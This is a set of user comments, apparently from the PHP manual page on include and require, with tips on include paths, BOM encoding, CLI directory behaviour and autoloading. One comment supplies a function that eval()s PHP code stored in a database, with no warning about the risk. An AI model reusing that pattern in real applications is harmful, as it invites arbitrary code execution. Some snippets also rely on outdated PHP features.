and the main pages are either newpubs_e.php or newpubs_f.php

<?php
if($_SERVER[PHP_SELF]=="/newpubs.php")
    {
   
header("Location: newpubs_e.php");
    exit;
    }
?>

Will send them to newpubs_e.php if they try to access newpubs.php directly.
this dot person at joaocunha dot eti dot br
6 years ago
AVOID ZERO BYTE ORDER MARK!

I was having problems with include/require (once or not). I created an include-opening.php which had the initial structure of the page, and then included this page in all other pages. The result was looking "crashed", so I did compare including or just pasting the html code into the page. The hardcoded version displayed ok, even with the source code being exactly the same.

So I opened the include file with notepad++ and set the encoding to UTF-8 (no BOM) and voila, everything is working great now.
Berenguer Blasi
10 years ago
When working with a well organized project you may come across multiple problems when including, if your files are properly stored in some nice folders structure such as:

- src
  - web
  - bo
- lib
- test
- whatever

as the include path's behaviour is somehow strange.

The workaround I use is having a file (ex: SiteCfg.class.php) where you set all the include paths for your project such as:

<?php
$BASE_PATH
= dirname(__FILE__);
$DEPENDS_PATH  = ".;".$BASE_PATH;
$DEPENDS_PATH .= ";".$BASE_PATH."/lib";
$DEPENDS_PATH .= ";".$BASE_PATH."/test";
ini_set("include_path", ini_get("include_path").";".$DEPENDS_PATH);
?>

Make all paths in this file relative to IT'S path. Later on you can import any file within those folders from wherever with inlude/_once, require/_once without worrying about their path.

Just cross fingers you have permissions to change the server's include path.
rich dot lovely at klikzltd dot co dot uk
7 years ago
I needed a way of include()ing a php page from a MySQL database.  It took some work, but
eventually I came up with this:

<?php
function include_text($text){
    while(
substr_count($text, '<?php') > 0){             //loop while there's code in $text
       
list($html, $text) = explode('<?php', $text, 2); //split at first open php tag
       
echo $html;                                      //echo text before tag
       
list($code, $text) = explode('?>', $text, 2);    //split at closing tag
       
eval($code);                                     //exec code (between tags)
   
}
    echo
$text;                                          //echo whatever is left
}
?>

It doesn't work exactly the same as include(), as newlines after the '?>' tag are echoed, rather
than being discarded, but that's an exercise left to the reader to fix if they so desire, and
also globals defined within the included text are not available outside the function.

Not sure whether it would work with something like:

<?php if($x){ ?>
<p>Some HTML Output</p>
...
...
<?php }
else{
?>
<p>Other HTML Output</p>
...
...
<?php } ?>

I rarely use that, but it's easy to re-write code to avoid it using HereDoc syntax, so the example above becomes:

<?php if($x){ echo <<<EOT
<p>Some HTML Output</p>
...
...
EOT;
}
else{ echo <<<
EOT
<p>Other HTML Output</p>
...
...
EOT;
}
?>

Which would work with include_text()

It also won't work as-is with either asp-style or short tags.
ethantsien at gmail dot com
2 years ago
"Files are included based on the file path given or, if none is given, the include_path specified. If the file isn't found in the include_path, include will finally check in the calling script's own directory and the current working directory before failing. "

i strace some php code, i think the first step is searching the current working directory , then include path, the final is the calling script's own directory
david dot gaia dot kano at dartmouth dot edu
12 years ago
I just discovered a "gotcha" for the behavior of include when using the command line version of php.

I copied all the included files needed for a new version of a program into a temporary directory, so I could run them "off to the side" before they were ready for release into the live area. One of the files with a new version (call it common.inc.php for this example) normally lives in one of the directories in the include path. But I did not want to put the new version there yet! So I copied common.inc.php into my temporary directory along with the others, figuring that the interpreter would find it there before it found it in the include directory, because my include path has a . at the beginning. When I tested it, everything was fine.

But then I setup a cron job to run the script automatically every day. In the crontab I placed the full path of the script. But when it ran, it included the old version of my common.inc.php file out of the include directory. Interestingly, the other include files that only existed in the temporary directory were included fine.

Evidently AFTER the include path is searched, the directory in which the main script lives is searched as well. So my temporary installation almost worked fine, except for the lack of the small change I had made in the common file introduced a bug.

To make it work I use a shell script to start my php script. It contains a cd command into the temporary directory, then starts the php script.

So "current directory" (the . in the include path) for a command line script is really the current directory you are in when executing the script. Whereas it means the directory in which the script lives when executing under apache.

I hope this helps save someone else the hours it took me to figure out my problem!

David
Nathan Ostgard
9 years ago
You can also use debug_backtrace to write a function that do the chdir automatically:

<?php
function include_relative($file)
{
   
$bt = debug_backtrace();
   
$old = getcwd();
   
chdir(dirname($bt[0]['file']));
    include(
$file);
   
chdir($old);
}
?>
Anonymous
10 years ago
Thought you can figure it out by reading the doc, this hint might save you some time. If you override include_path, be sure to include the current directory ( . ) in the path list, otherwise include("includes/a.php") will not search in the current script directory.

e.g :

<?php
if(file_exists("includes/a.php"))
   include(
"includes/a.php")
?>

The first line will test to true, however include will not find the file, and you'll get a "failed to open stream" error
AntonioCS at gmail dot com
7 years ago
Include and Require will call the __autoload function if the file that is being called extends some other class

Example Code:
File teste.php
<?php
class teste extends motherclass {
    public function
__construct() {
       
parent::__construct();   
    }      
}
?>

File example.php

<?php
require("teste.php");

if (
class_exists("motherclass"))
echo
"It exists";

?>

You will be given the output:

It exists

I think the __autoload function should be called when I instantiate the teste class not when I include/require the file.
To Top